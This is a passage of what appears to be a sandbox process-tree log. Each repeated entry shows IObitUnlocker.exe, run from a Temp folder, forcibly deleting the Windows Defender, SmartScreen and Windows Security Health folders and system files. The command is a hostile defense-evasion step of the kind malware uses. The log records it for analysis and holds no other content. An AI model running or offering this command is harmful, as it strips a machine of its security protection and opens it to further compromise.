                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                10⤵
                                                                                                  PID:3500
                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                  10⤵
                                                                                                    PID:2780
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                    10⤵
                                                                                                      PID:5260
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                      10⤵
                                                                                                        PID:2392
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                        10⤵
                                                                                                          PID:1476
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                          10⤵
                                                                                                            PID:5824
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                            10⤵
                                                                                                              PID:3800
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                              10⤵
                                                                                                                PID:3048
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                10⤵
                                                                                                                  PID:5212
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                  10⤵
                                                                                                                    PID:4284
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                    10⤵
                                                                                                                      PID:5872
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
